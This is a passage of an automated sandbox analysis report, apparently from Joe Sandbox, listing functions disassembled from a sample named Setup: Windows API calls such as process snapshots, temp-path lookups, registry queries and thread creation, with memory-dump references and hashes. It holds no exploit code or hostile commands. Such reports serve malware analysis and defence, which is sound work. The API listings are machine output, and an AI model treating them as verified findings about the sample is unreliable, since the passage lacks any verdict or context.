                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • GetTempPathW.KERNEL32(00000104,00000000,6C944B23,6C944614,6C944B23,00000000,00000010,00000010,?,00000000,6C944614,?,?,6C944B23), ref: 6C95A415
                                                                • Part of subcall function 6C935238: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C9352A3
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                                • Part of subcall function 6C93531E: __EH_prolog3.LIBCMT ref: 6C935325
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                              • String ID:
                                                              • API String ID: 3672672585-0
                                                              • Opcode ID: bb44663b073ef2744fa38dd3243a0cd38c1195597334d533280a63cc0a94ae07
                                                              • Instruction ID: 974333920d48e744c8d569c75e4fa84dcf9a06ce4a2ba69d81c464ceab473e00
                                                              • Opcode Fuzzy Hash: bb44663b073ef2744fa38dd3243a0cd38c1195597334d533280a63cc0a94ae07
                                                              • Instruction Fuzzy Hash: C6919F71900248DFEB14DFF8C844AEDBBB4AF39328F544659E450ABB81DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A5584 Relevance: 4.7, APIs: 3, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A558B
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000024,6C48F18B,?), ref: 6C4A559B
                                                                • Part of subcall function 6C48EFE2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C48EFFE
                                                                • Part of subcall function 6C48EFE2: _memset.LIBCMT ref: 6C48F018
                                                                • Part of subcall function 6C48EFE2: Process32FirstW.KERNEL32(00000000,?), ref: 6C48F032
                                                                • Part of subcall function 6C48EFE2: FindCloseChangeNotification.KERNEL32(00000000), ref: 6C48F061
                                                                • Part of subcall function 6C4A83ED: _memcpy_s.LIBCMT ref: 6C4A844E
                                                                • Part of subcall function 6C49EB56: __wcsicoll.LIBCMT ref: 6C49EB74
                                                              • GetTempPathW.KERNEL32(00000104,?,?,00000010,?,00000000,?,?,?,?,00000024,6C48F18B,?), ref: 6C4A57AE
                                                                • Part of subcall function 6C48EFE2: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C48F04D
                                                                • Part of subcall function 6C48F0C8: __EH_prolog3.LIBCMT ref: 6C48F0CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset
                                                              • String ID:
                                                              • API String ID: 4125857435-0
                                                              • Opcode ID: 51eac29564e98a9295520be779b97375227264c1196c62b8145500173aad2767
                                                              • Instruction ID: b79bc3927d754f060d1290aff5af8292a958189894705c5251ecb67c3a43775a
                                                              • Opcode Fuzzy Hash: 51eac29564e98a9295520be779b97375227264c1196c62b8145500173aad2767
                                                              • Instruction Fuzzy Hash: 929148719015488FEB00DBF8C949EDDBBB0EF15328F144659E060AB799DB34A90ACBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95988C Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C959893
                                                              • GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C914412: __EH_prolog3.LIBCMT ref: 6C914419
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9153D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,6C99EE70,?,?,?,?,6C95995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 6C915412
                                                                • Part of subcall function 6C9153D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,6C95995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C915440
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                              • String ID:
                                                              • API String ID: 168041992-0
                                                              • Opcode ID: 6b4be46bf5ba509f32f70390dbeda5e449fde55542c527aa510d3b00d3d0c3c5
                                                              • Instruction ID: 4eb259b4f6e32eb83c28de21feb0c5e8337084ed45ca674441b5aa646a99f061
                                                              • Opcode Fuzzy Hash: 6b4be46bf5ba509f32f70390dbeda5e449fde55542c527aa510d3b00d3d0c3c5
                                                              • Instruction Fuzzy Hash: 0F418E71904149DBDF01DBF8C844ADDBBB9BF25318F244256E020EBB81CB34DA198BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C62182C Relevance: 4.6, APIs: 3, Instructions: 109registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                              • RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                              • RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: 35472d5d66cefcef9772a6e1240be99005b799b7c44cc524351f697e8a97e61a
                                                              • Instruction ID: fbe7e997c5fa78b43b89551aef92fa3c573ff9acff40805b59b328845da65185
                                                              • Opcode Fuzzy Hash: 35472d5d66cefcef9772a6e1240be99005b799b7c44cc524351f697e8a97e61a
                                                              • Instruction Fuzzy Hash: 8D3103326051A5AFDB149F55C8C0F9A7BB4EB2174CF1041A9F910A79A1C339CD84DF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9190AA Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeH_prolog3
                                                              • String ID:
                                                              • API String ID: 2967515224-0
                                                              • Opcode ID: ff48dec0871fbdc7272bc38536cf2bea07430462664e7cd7bf6525d23bf81114
                                                              • Instruction ID: 22b594ce52b95f1de274e6b21c8fa39b88f5694f60c3e482e4caa3a49c4492af
                                                              • Opcode Fuzzy Hash: ff48dec0871fbdc7272bc38536cf2bea07430462664e7cd7bf6525d23bf81114
                                                              • Instruction Fuzzy Hash: 45318070A05249EFCF10DFA4C88999DBBB5BF15328F65856CE465EBA40C731DB85CB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49F5FD Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc$H_prolog3
                                                              • String ID:
                                                              • API String ID: 59120599-0
                                                              • Opcode ID: 3dbc8101a2f6d3039667a854add52716d431863821ae5b4ab43cec85ea3477c3
                                                              • Instruction ID: 019f6e28061bb1f475391611ef19d103a94257af4985767f4bdb64d1e89711b1
                                                              • Opcode Fuzzy Hash: 3dbc8101a2f6d3039667a854add52716d431863821ae5b4ab43cec85ea3477c3
                                                              • Instruction Fuzzy Hash: F31127716013029FE710CFA8C981F56BBE0EB14608F60882CE9A9CBB55DB31EC168B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9566E5 Relevance: 4.6, APIs: 3, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9566EC
                                                              • GetCommandLineW.KERNEL32(00000024,6C9536CF,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9566F3
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?), ref: 6C95672F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandDefaultLanguageLineUser
                                                              • String ID:
                                                              • API String ID: 4077140935-0
                                                              • Opcode ID: 08b33de2425aebebd5e32f8170e4ed93e5c031d1281d142f02c1aedc7e4a3fa4
                                                              • Instruction ID: 981ecc355fde23b1bdc6e8015f72ba1d38bd747e4b7d4864fdbedd7779ef5488
                                                              • Opcode Fuzzy Hash: 08b33de2425aebebd5e32f8170e4ed93e5c031d1281d142f02c1aedc7e4a3fa4
                                                              • Instruction Fuzzy Hash: 0E115E319017098FDB10DBA8D9849AD77B5AF64728B644755D121E7BC0DB30D954CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49DF19 Relevance: 4.6, APIs: 3, Instructions: 50threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001DFAB,?,00000000,00000000), ref: 6C49DF5E
                                                                • Part of subcall function 6C4A03F5: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 6C4A0415
                                                                • Part of subcall function 6C4A03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6C4A042B
                                                                • Part of subcall function 6C4A03F5: TranslateMessage.USER32(?), ref: 6C4A0435
                                                                • Part of subcall function 6C4A03F5: DispatchMessageW.USER32(?), ref: 6C4A043F
                                                                • Part of subcall function 6C4A03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C4A044E
                                                              • GetExitCodeThread.KERNEL32(00000000,000000FF), ref: 6C49DF77
                                                              • CloseHandle.KERNEL32(00000000), ref: 6C49DF7E
                                                                • Part of subcall function 6C49CB21: __EH_prolog3.LIBCMT ref: 6C49CB28
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB50
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB5D
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB6A
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB77
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DestroyIconMessage$PeekThread$CloseCodeCreateDispatchExitH_prolog3HandleMultipleObjectsTranslateWait
                                                              • String ID:
                                                              • API String ID: 1402139836-0
                                                              • Opcode ID: f21005df252620479ffacc29ec03125b4ef8222b0db31b71605d13fdb7b4bb47
                                                              • Instruction ID: 3497b44210646b3e35eb50d857e59ed0d0dc412496fc4fa7cd100e5adf9123e7
                                                              • Opcode Fuzzy Hash: f21005df252620479ffacc29ec03125b4ef8222b0db31b71605d13fdb7b4bb47
                                                              • Instruction Fuzzy Hash: A0016532505214AFC700EF64CC09CABBBA9EF46324F008A1EF8658B150D731D916CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95CC2C Relevance: 4.5, APIs: 3, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc$H_prolog3
                                                              • String ID:
                                                              • API String ID: 59120599-0
                                                              • Opcode ID: ee63c69177cd262e70c10350099fc1019734de36a0f5a289dda91d5de3881c4e
                                                              • Instruction ID: 7c0bb45e316b5c1668f8f112cb1954b5e134ee5bde2358ec73ab3475464938f4
                                                              • Opcode Fuzzy Hash: ee63c69177cd262e70c10350099fc1019734de36a0f5a289dda91d5de3881c4e
                                                              • Instruction Fuzzy Hash: 88011E756417029FE710EF69C941B6677E5EF29708F508828EAEACBB50E730E824DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91C406 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C426
                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C950F4A,00000004,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C43F
                                                              • RegCloseKey.KERNEL32(?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02642228,00000004,6C950F4A,?), ref: 6C91C44E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: ffee4395cfb0d23bf2512616f92eac16ea112d64e4df7f144ada640c8cc8caf6
                                                              • Instruction ID: 9e2633967adca99f4723a86b617154282b9274f0b2e3a67607011234c5330763
                                                              • Opcode Fuzzy Hash: ffee4395cfb0d23bf2512616f92eac16ea112d64e4df7f144ada640c8cc8caf6
                                                              • Instruction Fuzzy Hash: 17F03CB2200108BFEB119FA5CC86EAE7B7DEF513A8F104225F92096690D771DE54AB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C917CE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917CEF
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C917EE4: __EH_prolog3.LIBCMT ref: 6C917EEB
                                                                • Part of subcall function 6C915DD0: __EH_prolog3.LIBCMT ref: 6C915DD7
                                                                • Part of subcall function 6C915485: __EH_prolog3.LIBCMT ref: 6C91548C
                                                                • Part of subcall function 6C915485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C917DAF,?,?,?,?,?,00000000,?,?,6C90AB18,00000008,6C917CD9), ref: 6C91549C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$HandleModule
                                                              • String ID: Unknown
                                                              • API String ID: 1530205010-1654365787
                                                              • Opcode ID: bc629b201ba6b08d74ab3b108e0cb2cf9cd13475b34dd48e5723f36307aa6cf8
                                                              • Instruction ID: 8f00896ed8344802a4d6723446288cdffc130aeb2633ef55ecee48e39660d190
                                                              • Opcode Fuzzy Hash: bc629b201ba6b08d74ab3b108e0cb2cf9cd13475b34dd48e5723f36307aa6cf8
                                                              • Instruction Fuzzy Hash: 59313F715107059AE728DFB4C842BEBB3A8BF25314F504E1EA179DBBC0DB70E9488755
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C922811 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C922818
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C921EBF: __EH_prolog3.LIBCMT ref: 6C921EC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_malloc
                                                              • String ID: BlockIfGroup
                                                              • API String ID: 1683881009-1356723647
                                                              • Opcode ID: 2c19ef3e05af0475ab43404b083dcbbd7ca51e5cb5dbd838a6fecd97c5079d43
                                                              • Instruction ID: 9c1cfa7296238928b668d48cde1e96e3581aab02544a41bd5b5ad1116e9c1e0b
                                                              • Opcode Fuzzy Hash: 2c19ef3e05af0475ab43404b083dcbbd7ca51e5cb5dbd838a6fecd97c5079d43
                                                              • Instruction Fuzzy Hash: EA31947092060AEBDF04DFF9C948BDE77B8AF25318F1044A5E554EB685D734CA04CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A54B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: %TEMP%
                                                              • API String ID: 431132790-235365282
                                                              • Opcode ID: bdabb19927a1e5adc26456249c4df50dc67fd70db28e3edcc23e0d28f0b71a38
                                                              • Instruction ID: f0c4adeff2d48fe59bf892a6b3dc7c7e2aae61e4bbb0f78b97deef47f686ee22
                                                              • Opcode Fuzzy Hash: bdabb19927a1e5adc26456249c4df50dc67fd70db28e3edcc23e0d28f0b71a38
                                                              • Instruction Fuzzy Hash: AC216D71A01159ABDF00DFA4CC88CEEBB75FF14315B004529F925AB698DB30DA16CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944AD6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C944ADD
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AppendPath_memcpy_s
